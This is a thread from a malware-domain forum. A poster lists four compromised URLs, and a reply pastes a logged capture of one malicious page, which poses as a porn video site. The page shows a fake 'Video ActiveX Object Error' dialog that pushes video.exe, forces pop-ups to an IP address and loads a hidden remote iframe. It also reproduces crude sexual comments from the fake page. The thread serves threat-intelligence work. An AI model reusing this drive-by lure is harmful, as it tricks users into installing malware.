Malware Domain List

Malware Related => Malicious Domains => Topic started by: bobby on July 07, 2008, 03:18:44 pm

Title: R-thing
Post by: bobby on July 07, 2008, 03:18:44 pm
Code: [Select]
http://juangeronimo.com.ar/r.html
http://www.cristal-rmf.it/r.html
http://knightys.net/r.html
http://livresedotabaco.com/r.html
Really hard obfuscation. Dumps a couple of different infections.
Title: Re: R-thing
Post by: CM_MWR on July 07, 2008, 08:35:53 pm
Code: [Select]

00001 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
00002 <html xmlns="http://www.w3.org/1999/xhtml" lang="de-DE"><head>
00003
00004
00005
00006 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>PornTube: best movies collection.</title>
00007
00008
00009
00010
00011 <style>
00012 .cl {clear:both;}
00013 a {color:#163286;}
00014 body { font-family:Arial, Helvetica, sans-serif; font-size:12px;}
00015 .td-thumb {padding-bottom:18px;}
00016 .td-thumb img {border:1px solid #555; padding:1px;}
00017 .td-thumb table {font-size:14px; color:#444; text-align:left; margin-top:7px; width:290px;}
00018 .td-author a {cursor:pointer; font-size:14px; font-weight:bold;}
00019 .span-length {color:#222222; font-weight:bold;}
00020 .td-rating img {position:relative; top:3px; border:0px;}
00021 .span-views {color:#222222; font-weight:bold;}
00022 .div-comments {width:93%; margin-bottom:10px;}
00023 .div-comments-1 {background:#eeeeee; padding:5px;}
00024 .div-comments-1 a{font-size:14px; font-weight:bold;}
00025 .div-comments-2 {text-align:right; padding-right:15px;}
00026 .side-thumb {padding:1px; border:1px solid #777; width:160px; }
00027 .side-from a {cursor:pointer; font-size:14px; font-weight:bold;}
00028 .response {border:3px solid #dcdcdc; width:70px;}
00029 .response-user {cursor:pointer; text-decoration:underline;}
00030 </style>
00031 <script>
00032
00033 var flag=false;
00034 function scan()
00035 {
00036 is_IE=false;
00037 if (navigator.appName.toLowerCase()=='microsoft internet explorer')
00038 {
00039 if (navigator.userAgent.toLowerCase().indexOf('opera')<=0)
00040 {
00041 is_IE=true;
00042 }
00043 }
00044 if(is_IE)
00045 {
00046 if(window.ActiveXObject)
00047 {
00048
00049
00050 }
00051 return true;
00052 }
00053 return true;
00054 }
00055
00056 window.setInterval("scan()",10000);
00057
00058
00059
00060
00061 var is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
00062 var is_IE=false;
00063 if (navigator.appName.toLowerCase()=='microsoft internet explorer')
00064 {
00065 if (navigator.userAgent.toLowerCase().indexOf('opera')<=0)
00066 {
00067 is_IE=true;
00068 }
00069 }
00070
00071 function onloadExecutable()
00072 {
00073 if (is_IE)
00074 {
00075 if (is_XP_SP2 && typeof iie != 'undefined')
00076 {
00077 iie.launchURL("video.exe");
00077 No Error: 200 URL video.exe js: onloadExecutable
00078 }
00079 else
00080 {
00081 w=screen.width/2-280;
00082 h=screen.height/2-60;
00083 window.open("video.exe","new", "width=580,height=180,left="+w+",top="+h);
00083 No Error: 200 URL video.exe js: onloadExecutable
00084 }
00085 }
00086 else
00087 {
00088 w=screen.width/2-280;
00089 h=screen.height/2-60;
00090 window.open("video.exe", "_blank", "width=580,height=180,left="+w+",top="+h);
00090 No Error: 200 URL video.exe js: onloadExecutable
00091 }
00092 }
00093
00094
00095 function activex_is_here()
00096 {
00097 try
00098 {
00099 var testObject = new ActiveXObject("videoPl.chl");
00099 Error: 404 Not Found videoPl.chl js: activex_is_here
00100 return true;
00101 }
00102 catch(e)
00103 {
00104 ;
00105 }
00106
00107 return false;
00108 }
00109
00110 function codecDownload()
00111 {
00112 if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
00113 return;
00114 }
00115 else {
00116 onloadExecutable();
00117 }
00118 }
00119 </script></head><body onbeforeunload="window.open('http://61.162.230.12/index.php');" onunload="window.open('http://61.162.230.12/index.php');" onclose="window.open('http://61.162.230.12/index.php');" id="mainbody">
00119 No Error: 200 URL http://61.162.230.12/index.php js:
00119 No Error: 200 URL http://61.162.230.12/index.php js:
00119 No Error: 200 URL http://61.162.230.12/index.php js:
00120
00121
00122
00123
00124
00125
00126
00127 <script>
00128
00129 codecDownload();
00130
00131 </script>
00132 <script>
00133
00134
00135 var Drag = {
00136 obj : null,
00137 init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
00138 {
00139 o.onmousedown = Drag.start;
00140
00141 o.hmode = bSwapHorzRef ? false : true ;
00142 o.vmode = bSwapVertRef ? false : true ;
00143
00144 o.root = oRoot && oRoot != null ? oRoot : o ;
00145
00146 if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
00147 if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
00148 if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
00149 if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";
00150
00151 o.minX = typeof minX != 'undefined' ? minX : null;
00152 o.minY = typeof minY != 'undefined' ? minY : null;
00153 o.maxX = typeof maxX != 'undefined' ? maxX : null;
00154 o.maxY = typeof maxY != 'undefined' ? maxY : null;
00155
00156 o.xMapper = fXMapper ? fXMapper : null;
00157 o.yMapper = fYMapper ? fYMapper : null;
00158
00159 o.root.onDragStart = new Function();
00160 o.root.onDragEnd = new Function();
00161 o.root.onDrag = new Function();
00162 },
00163
00164 start : function(e)
00165 {
00166 var o = Drag.obj = this;
00167 e = Drag.fixE(e);
00168 var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
00169 var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
00170 o.root.onDragStart(x, y);
00171
00172 o.lastMouseX = e.clientX;
00173 o.lastMouseY = e.clientY;
00174
00175 if (o.hmode) {
00176 if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
00177 if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
00178 } else {
00179 if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
00180 if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
00181 }
00182
00183 if (o.vmode) {
00184 if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
00185 if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
00186 } else {
00187 if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
00188 if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
00189 }
00190
00191 document.onmousemove = Drag.drag;
00192 document.onmouseup = Drag.end;
00193
00194 return false;
00195 },
00196
00197 drag : function(e)
00198 {
00199 e = Drag.fixE(e);
00200 var o = Drag.obj;
00201
00202 var ey = e.clientY;
00203 var ex = e.clientX;
00204 var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
00205 var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
00206 var nx, ny;
00207
00208 if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
00209 if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
00210 if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
00211 if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);
00212
00213 nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
00214 ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));
00215
00216 if (o.xMapper) nx = o.xMapper(y)
00217 else if (o.yMapper) ny = o.yMapper(x)
00218
00219 Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
00220 Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
00221 Drag.obj.lastMouseX = ex;
00222 Drag.obj.lastMouseY = ey;
00223
00224 Drag.obj.root.onDrag(nx, ny);
00225 return false;
00226 },
00227
00228 end : function()
00229 {
00230 document.onmousemove = null;
00231 document.onmouseup = null;
00232 Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
00233 parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
00234 Drag.obj = null;
00235 },
00236
00237 fixE : function(e)
00238 {
00239 if (typeof e == 'undefined') e = window.event;
00240 if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
00241 if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
00242 return e;
00243 }
00244 };
00245
00246 function Down(download,e)
00247 {
00248 if (e!=null && e.keyCode==27)
00249 {
00250 //Close();
00251 //return;
00252 }
00253 switch (download)
00254 {
00255 case "iax": onloadExecutable(); break;
00256 Close();
00257 }
00258
00259 }
00260
00261 function vc() {
00262 if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
00263 onloadExecutable();
00264 }
00265 else {
00266 if (alert('Please install new version of Video ActiveX Object.')) {
00267 vc();
00268 }
00269 else {
00270 vc();
00271 }
00272 }
00273 }
00274
00275 function Close()
00276 {
00277 var p=document.getElementById("popdiv");
00278 p.style.visibility="hidden";
00279 vc();
00280 }
00281 function Details()
00282 {
00283 alert('You must download Video ActiveX Object to play this video file.');
00284 }
00285
00286 </script>
00287
00288
00289 <div name="popdiv" id="popdiv" onkeypress="Down('iax',event);" style="position: absolute; top: 38%; left: 38%; z-index: 5; visibility: hidden;">
00290 <table cellpadding="0" cellspacing="0" height="126" width="362">
00291 <tbody><tr>
00292 <td>
00293 <table style="background-image: url(xptop.gif); height: 29px;" cellpadding="0" cellspacing="0" height="29" width="362"> <!-- win top table -->
00294 <tbody><tr>
00295 <td style="color: white; font-family: Tahoma; font-size: 13px; font-weight: bold; padding-left: 4px; padding-top: 1px;">  Video ActiveX Object Error.</td>
00296 <td style="padding-right: 6px;" width="21"><img src="xpclose.gif" onclick="Close();" style="cursor: default;" height="21" width="21"></td>
00296 No Error: 200 URL xpclose.gif
00297 </tr>
00298 </tbody></table>
00299 </td>
00300 </tr>
00301 <tr>
00302 <td>
00303 <table cellpadding="0" cellspacing="0" height="97">
00304 <tbody><tr>
00305 <td style="background-image: url(xpleftclm.gif); background-repeat: repeat-y;" valign="bottom">
00306 <table cellpadding="0" cellspacing="0">
00307 <tbody><tr>
00308 <td><img src="xpleftclm.gif" height="97" width="3"></td>
00308 No Error: 200 URL xpleftclm.gif
00309 </tr>
00310 </tbody></table>
00311 </td>
00312 <td valign="top">
00313 <table style="background: rgb(236, 233, 216) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" bgcolor="ece9d8" cellpadding="0" cellspacing="0" width="356">
00314 <tbody style="background: rgb(236, 233, 216) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" bgcolor="ece9d8"><tr style="background: rgb(236, 233, 216) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" bgcolor="ece9d8">
00315 <td style="background: rgb(236, 233, 216) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" bgcolor="ece9d8">
00316 <table bgcolor="ece9d8" cellpadding="0" cellspacing="0" height="59">
00317 <tbody bgcolor="ece9d8"><tr>
00318 <td style="padding-left: 20px; padding-top: 13px;" align="center" valign="top"><img src="alert.gif" height="32" width="31"></td>
00318 No Error: 200 URL alert.gif
00319 <td style="font-size: 11px; font-family: Tahoma; padding-left: 30px; padding-bottom: 8px; padding-right: 5px;" align="left"><br><b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file.
00320 </td>
00321 </tr>
00322 </tbody></table>
00323 </td>
00324 </tr>
00325 <tr>
00326 </tr><tr bgcolor="ece9d8">
00327 <td style="padding-left: 20px; padding-right: 20px; padding-bottom: 20px; font-family: Tahoma; font-size: 11px;" align="center">
00328 <hr><br>
00329 Click Continue to download and install ActiveX Object.
00330
00331 </td>
00332 </tr>
00333 <tr><td>
00334 <table align="center" cellpadding="0" cellspacing="6" height="22">
00335 <tbody><tr height="22">
00336 <td><input value="Continue" onclick="Down('iax');" style="font-size: 11px; font-family: Arial; height: 23px; width: 82px;" tabindex="1" id="Button1" name="Button1" type="button"><br><br></td>
00337 <td></td>
00338 <td><input value="Cancel" onclick="Close()" style="font-size: 11px; font-family: Arial; height: 23px; width: 82px;" id="Button3" name="Button3" type="button"><br><br></td>
00339 <td><input value="Details..." onclick="Details()" style="font-size: 11px; font-family: Arial; height: 23px; width: 82px;" id="Button3" name="Button3" type="button"><br><br></td>
00340 </tr>
00341 </tbody></table>
00342 </td>
00343 </tr>
00344 <tr>
00345 <td>
00346 <table cellpadding="0" cellspacing="0" width="100%">
00347 <tbody><tr style="height: 1px;" bgcolor="4577ea">
00348 <td style="background: rgb(69, 119, 234) none repeat scroll 0%; height: 1px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></td>
00349 </tr> <!-- empty colors -->
00350 <tr style="height: 1px;" bgcolor="0029b5">
00351 <td style="background: rgb(0, 41, 181) none repeat scroll 0%; height: 1px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></td>
00352 </tr>
00353 <tr style="height: 1px;" bgcolor="001590">
00354 <td style="background: rgb(0, 21, 144) none repeat scroll 0%; height: 1px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></td>
00355 </tr>
00356 </tbody></table>
00357 </td>
00358 </tr>
00359 </tbody></table>
00360 </td>
00361 <td style="background-image: url(xprightclm.gif); background-repeat: repeat-y;" valign="bottom">
00362 <table cellpadding="0" cellspacing="0">
00363 <tbody><tr>
00364 <td style="padding: 0px;"><img src="xprightclm.gif" height="97" width="3"></td>
00364 No Error: 200 URL xprightclm.gif
00365 </tr>
00366 </tbody></table>
00367 </td>
00368 </tr>
00369 </tbody></table>
00370 </td>
00371 </tr>
00372 </tbody></table>
00373
00374
00375 <script>
00376 if (navigator.userAgent.indexOf("Firefox")!=-1) {
00377 if (activex_is_here()) { } else {
00378 setTimeout("Close();", 1000);
00379 }
00380 }
00381 else {
00382 if (activex_is_here()) { } else {
00383 setTimeout("showPopDiv();",2000);
00384 }
00385 }
00386
00387 function showPopDiv()
00388 {
00389 var sFlag = "No";
00390 var byFlag = false;
00391 var FlagAr = sFlag.split("");
00392
00393 if (FlagAr[0]=="1"){byFlag = true;}
00394 if (FlagAr[0]=="3"){byFlag = true;}
00395
00396 if(!byFlag) {
00397 var p=document.getElementById("popdiv");
00398
00399 var myWidth = 0, myHeight = 0;
00400 if( typeof( window.innerWidth ) == 'number' ) {
00401 myWidth = window.innerWidth;
00402 myHeight = window.innerHeight;
00403 } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
00404 myWidth = document.documentElement.clientWidth;
00405 myHeight = document.documentElement.clientHeight;
00406 } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
00407 myWidth = document.body.clientWidth;
00408 myHeight = document.body.clientHeight;
00409 }
00410
00411 function getScroll() {
00412
00413 var scrOfX = 0, scrOfY = 0;
00414 if( typeof( window.pageYOffset ) == 'number' ) {
00415 scrOfY = window.pageYOffset;
00416 scrOfX = window.pageXOffset;
00417 } else if( document.body && ( document.body.scrollLeft || document.body.scrollTop ) ) {
00418 scrOfY = document.body.scrollTop;
00419 scrOfX = document.body.scrollLeft;
00420 } else if( document.documentElement && ( document.documentElement.scrollLeft || document.documentElement.scrollTop ) ) {
00421 scrOfY = document.documentElement.scrollTop;
00422 scrOfX = document.documentElement.scrollLeft;
00423 }
00424 return [scrOfX, scrOfY];
00425
00426 }
00427
00428 sc = getScroll();
00429 p.style.top = (myHeight/2 - 181)+sc[1]+'px';
00430 p.style.left = (myWidth/2 - 120) + sc[0]+'px';
00431 p.style.visibility = 'visible';
00432 p.focus();
00433 }
00434 }
00435
00436 Drag.init(document.getElementById("popdiv"));
00437 </script>
00438 </div>
00439
00440
00441 <iframe src="http://digitaltreath.info/cgi-bin/index.cgi?user90" frameborder="0" style="display:none"></iframe>
00441 Possible Error: 902 Connect Error http://digitaltreath.info/cgi-bin/index.cgi?user90 <Frame> [Connection Refused 61 ]
00442
00443 <div style="margin: 0px auto; width: 980px;">
00444 <table align="center" cellpadding="0" cellspacing="0" width="980">
00445 <tbody><tr>
00446 <td style="text-align: left;"><img src="logo.gif"><img src="showyrs.gif" style="position: relative; top: 15px; left: -115px;"></td>
00446 No Error: 200 URL logo.gif
00446 No Error: 200 URL showyrs.gif
00447 <td style="text-align: right;"><a style="cursor: pointer; text-decoration: underline;"><b>Sign Up</b></a>  |  <a style="cursor: pointer; text-decoration: underline;">My Account</a>  |  <a style="cursor: pointer; text-decoration: underline;">History</a>  |  <a style="cursor: pointer; text-decoration: underline;">Help</a>  |  <a style="cursor: pointer; text-decoration: underline;">Log In</a>  |  <a style="cursor: pointer; text-decoration: underline;">Site</a></td>
00448 </tr>
00449 </tbody></table>
00450 <div style="margin: 0px auto; width: 980px;">
00451 <table cellpadding="0" cellspacing="0" width="100%">
00452 <tbody><tr>
00453 <td>
00454 <ul style="margin: 0px auto; padding: 0px; width: 500px;">
00455 <li style="border-style: solid solid none; border-color: rgb(182, 187, 206) rgb(182, 187, 206) -moz-use-text-color; border-width: 1px 1px 0px; padding: 5px 25px; float: left; margin-left: 7px; display: block; font-size: 13px; font-weight: bold; background-image: url(but-act.gif);"><a style="cursor: pointer; color: rgb(51, 51, 51); text-decoration: none;">Videos</a></li>
00456 <li style="border-style: solid solid none; border-color: rgb(182, 187, 206) rgb(182, 187, 206) -moz-use-text-color; border-width: 1px 1px 0px; padding: 5px 25px; float: left; margin-left: 7px; display: block; font-size: 13px; font-weight: bold; background-image: url(but-inact.gif);"><a style="cursor: pointer; color: rgb(16, 45, 111); text-decoration: none;">Categories</a></li>
00457 <li style="border-style: solid solid none; border-color: rgb(182, 187, 206) rgb(182, 187, 206) -moz-use-text-color; border-width: 1px 1px 0px; padding: 5px 25px; float: left; margin-left: 7px; display: block; font-size: 13px; font-weight: bold; background-image: url(but-inact.gif);"><a style="cursor: pointer; color: rgb(16, 45, 111); text-decoration: none;">Channels</a></li>
00458 <li style="border-style: solid solid none; border-color: rgb(182, 187, 206) rgb(182, 187, 206) -moz-use-text-color; border-width: 1px 1px 0px; padding: 5px 25px; float: left; margin-left: 7px; display: block; font-size: 13px; font-weight: bold; background-image: url(but-inact.gif);"><a style="cursor: pointer; color: rgb(16, 45, 111); text-decoration: none;">Community</a></li>
00459 </ul>
00460 </td>
00461 <td width="80"><a style="cursor: pointer;"><img src="upload.gif" style="border: 0px none ;"></a></td>
00461 No Error: 200 URL upload.gif
00462 </tr>
00463 </tbody></table>
00464 </div>
00465 <table cellpadding="0" cellspacing="0" height="36" width="100%">
00466 <tbody><tr>
00467 <td style="width: 9px;"><img src="gray1.gif"></td>
00467 No Error: 200 URL gray1.gif
00468 <td style="text-align: center; background-image: url(gray0.gif);"><input name="search_query" maxlength="128" style="width: 256px; height: 20px;" type="text"> <input name="search" value="Search" type="submit"></td>
00469 <td style="width: 9px;"><img src="gray2.gif"></td>
00469 No Error: 200 URL gray2.gif
00470 </tr>
00471 </tbody></table>
00472
00473 <div style="margin: 5px; font-size: 24px; color: rgb(51, 51, 51);"> </div>
00474
00475 <table cellspacing="5" width="100%">
00476 <tbody><tr>
00477 <td valign="top" width="60%">
00478 <!-- player-->
00479 <div style="width: 93%;">
00480 <div style="margin: 0px auto; width: 480px;" id="playMov">
00481
00482 <a href="video.exe" onclick="onloadExecutable()"><img style="cursor: default;" src="7598829497.jpg" border="0" width="480"></a><br>
00482 No Error: 200 URL video.exe <img>
00482 No Error: 200 URL 7598829497.jpg
00483 <a href="video.exe" onclick="onloadExecutable()"><img style="cursor: default;" src="player.jpg" border="0"></a>
00483 No Error: 200 URL video.exe <img>
00483 No Error: 200 URL player.jpg
00484 </div>
00485
00486 <div style="margin: 10px auto; width: 400px; font-size: 14px; font-weight: bold; text-align: center;">
00487 <img src="share.jpg" style="position: relative; top: 2px;"> <a style="cursor: pointer; text-decoration: underline;">Share</a>
00487 No Error: 200 URL share.jpg
00488 <img src="favorites.jpg" style="position: relative; top: 2px; margin-left: 20px;"> <a style="cursor: pointer; text-decoration: underline;">Favorite</a>
00488 No Error: 200 URL favorites.jpg
00489 <img src="playlist.jpg" style="position: relative; top: 2px; margin-left: 20px;"> <a style="cursor: pointer; text-decoration: underline;">Add to Playlist</a>
00489 No Error: 200 URL playlist.jpg
00490 </div>
00491 <div style="margin: 10px auto; width: 400px; font-size: 14px; font-weight: bold; text-align: center; color: rgb(51, 51, 51);">
00492 Rating: <img src="rating4_002.jpg" style="position: relative; top: 4px;">
00492 No Error: 200 URL rating4_002.jpg
00493      Views: 1,356,905
00494 </div>
00495 <div style="margin: 10px auto; width: 400px; font-size: 12px; text-align: center; color: rgb(51, 51, 51);">
00496 Comments: <a style="cursor: pointer; text-decoration: underline;">4</a>  Favourited: 128 times  Honors: <a style="cursor: pointer; text-decoration: underline;">3</a>  Links: <a style="cursor: pointer; text-decoration: underline;">2</a>
00497
00498 </div>
00499
00500 </div>
00501
00502 <div style="width: 93%; margin-bottom: 5px; margin-top: 10px;">
00503 <div style="padding: 5px; background: rgb(238, 238, 238) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; font-size: 14px;"><b>Video Responses</b> (<a href="#">view all 5 responses</a>)</div>
00503 No Error: 200 URL r.html view all 5 responses
00504 <div style="text-align: center; padding-right: 15px;">
00505
00506 <table style="text-align: center;" align="center" cellspacing="7">
00507 <tbody><tr>
00508
00509 <td><a href="video.exe"><img src="4521569111.jpg" class="response"></a><br><a class="response-user">painkiller625</a></td>
00509 No Error: 200 URL video.exe <img>
00509 No Error: 200 URL 4521569111.jpg
00510 <td><a href="video.exe"><img src="4957950055.jpg" class="response"></a><br><a class="response-user">SatyrIconIc</a></td>
00510 No Error: 200 URL video.exe <img>
00510 No Error: 200 URL 4957950055.jpg
00511 <td><a href="video.exe"><img src="3709569718.jpg" class="response"></a><br><a class="response-user">joetelo</a></td>
00511 No Error: 200 URL video.exe <img>
00511 No Error: 200 URL 3709569718.jpg
00512 <td><a href="video.exe"><img src="1693018480.jpg" class="response"></a><br><a class="response-user">Jizzpower</a></td>
00512 No Error: 200 URL video.exe <img>
00512 No Error: 200 URL 1693018480.jpg
00513 <td><a href="video.exe"><img src="3396659987.jpg" class="response"></a><br><a class="response-user">nj201</a></td>
00513 No Error: 200 URL video.exe <img>
00513 No Error: 200 URL 3396659987.jpg
00514 </tr>
00515 </tbody></table>
00516
00517
00518 </div>
00519 </div>
00520 <span style="font-size: 14px; font-weight: bold;">User comments.</span>
00521
00522
00523 <!-- comment 1 -->
00524 <div class="div-comments">
00525 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">aspirin2007</a></div>
00526 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00527 <div>nice cum @ the end
00528 </div>
00529 </div>
00530
00531
00532 <!-- comment 1 -->
00533 <div class="div-comments">
00534 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">Green</a></div>
00535 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00536 <div>Utter fake dick man!!!!!!!!!
00537 </div>
00538 </div>
00539
00540
00541 <!-- comment 1 -->
00542 <div class="div-comments">
00543 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">lekkertje</a></div>
00544 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00545 <div>this one makes me wanna be dp-ed
00546 </div>
00547 </div>
00548
00549
00550 <!-- comment 1 -->
00551 <div class="div-comments">
00552 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">tmoney42000</a></div>
00553 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00554 <div>POst more of her
00555 </div>
00556 </div>
00557
00558
00559 <!-- comment 1 -->
00560 <div class="div-comments">
00561 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">SatyrIconIc</a></div>
00562 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00563 <div>5 stars. She has a hot body and the look of the scene is well shot. Fucking in the tub is good, clean fun!
00564 </div>
00565 </div>
00566
00567
00568 <!-- comment 1 -->
00569 <div class="div-comments">
00570 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">sweetkisses87</a></div>
00571 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00572 <div>That is one of the hottest videos I've ever seen mmmm
00573 </div>
00574 </div>
00575
00576
00577 <!-- comment 1 -->
00578 <div class="div-comments">
00579 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">joetelo</a></div>
00580 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00581 <div>dude
00582 nice clip, just a little advice, you should probably rename this clip
00583 by putting her name on the title, cuz lots of ppl are looking for
00584 Tiffany Mynx. And yo if you have anymore of Tiff be free to post. Take
00585 care dude!
00586 </div>
00587 </div>
00588
00589
00590 <!-- comment 1 -->
00591 <div class="div-comments">
00592 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">painkiller625</a></div>
00593 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00594 <div>yea thats a job and a half
00595 </div>
00596 </div>
00597
00598
00599 <!-- comment 1 -->
00600 <div class="div-comments">
00601 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">Jizzpower</a></div>
00602 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00603 <div>Hell yeah! I would let her shit on me!!!
00604 </div>
00605 </div>
00606
00607
00608 <!-- comment 1 -->
00609 <div class="div-comments">
00610 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">Relexted</a></div>
00611 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00612 <div>great ass
00613 </div>
00614 </div>
00615
00616
00617 <!-- comment 1 -->
00618 <div class="div-comments">
00619 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">CreoleKid</a></div>
00620 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00621 <div>Holy Shit, She's too much!
00622 </div>
00623 </div>
00624
00625
00626 <!-- comment 1 -->
00627 <div class="div-comments">
00628 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">budda9</a></div>
00629 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00630 <div>she knows how to work it... damn what a body...
00631 </div>
00632 </div>
00633
00634
00635 <!-- comment 1 -->
00636 <div class="div-comments">
00637 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">icenutz</a></div>
00638 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00639 <div>fake dick.. fake cum
00640 </div>
00641 </div>
00642
00643
00644 <!-- comment 1 -->
00645 <div class="div-comments">
00646 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">tmoney42000</a></div>
00647 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00648 <div>Ms. O'lovely is so sexy
00649 </div>
00650 </div>
00651
00652
00653 <!-- comment 1 -->
00654 <div class="div-comments">
00655 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">hornyblower</a></div>
00656 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00657 <div>Great - reminds me of someone/somewhere/somewhen...
00658 </div>
00659 </div>
00660
00661
00662 <!-- comment 1 -->
00663 <div class="div-comments">
00664 <div class="div-comments-1"><a style="cursor: pointer; text-decoration: underline;">arseHOLE</a></div>
00665 <div class="div-comments-2">(<a style="cursor: pointer; text-decoration: underline;">Reply</a>)</div>
00666 <div>A REAL FUCK DOLL BEING GIVEN 8 INCHES OF PAIN
00667 </div>
00668 </div>
00669
00670 </td>
00671
00672 <td valign="top">
00673 <div style="border: 1px solid rgb(203, 207, 208); padding: 5px; background-color: rgb(238, 238, 238); margin-bottom: 15px;">
00674 From: <a href="#" style="font-size: 14px; font-weight: bold;">usagi</a><br>
00674 No Error: 200 URL r.html usagi
00675 Joined: 7 months ago<br>
00676 Videos: 12
00677 </div>
00678 <span style="font-size: 14px; font-weight: bold;">Relative movies.</span>
00679 <div style="border: 1px solid rgb(204, 204, 204); overflow: auto; height: 700px; margin-top: 10px;">
00680
00681 <!-- side thumb 1-->
00682 <table>
00683 <tbody><tr>
00684 <td><a href="video.exe"><img src="4521569111.jpg" class="side-thumb"></a></td>
00684 No Error: 200 URL video.exe <img>
00684 No Error: 200 URL 4521569111.jpg
00685 <td style="color: rgb(119, 119, 119);">
00686 <table>
00687 <tbody><tr class="side-from"><td>From:</td><td><a>painkiller625</a></td></tr>
00688 <tr><td>Length:</td><td><b>9:15</b></td></tr>
00689 <tr><td>View:</td><td><b>68,693</b></td></tr>
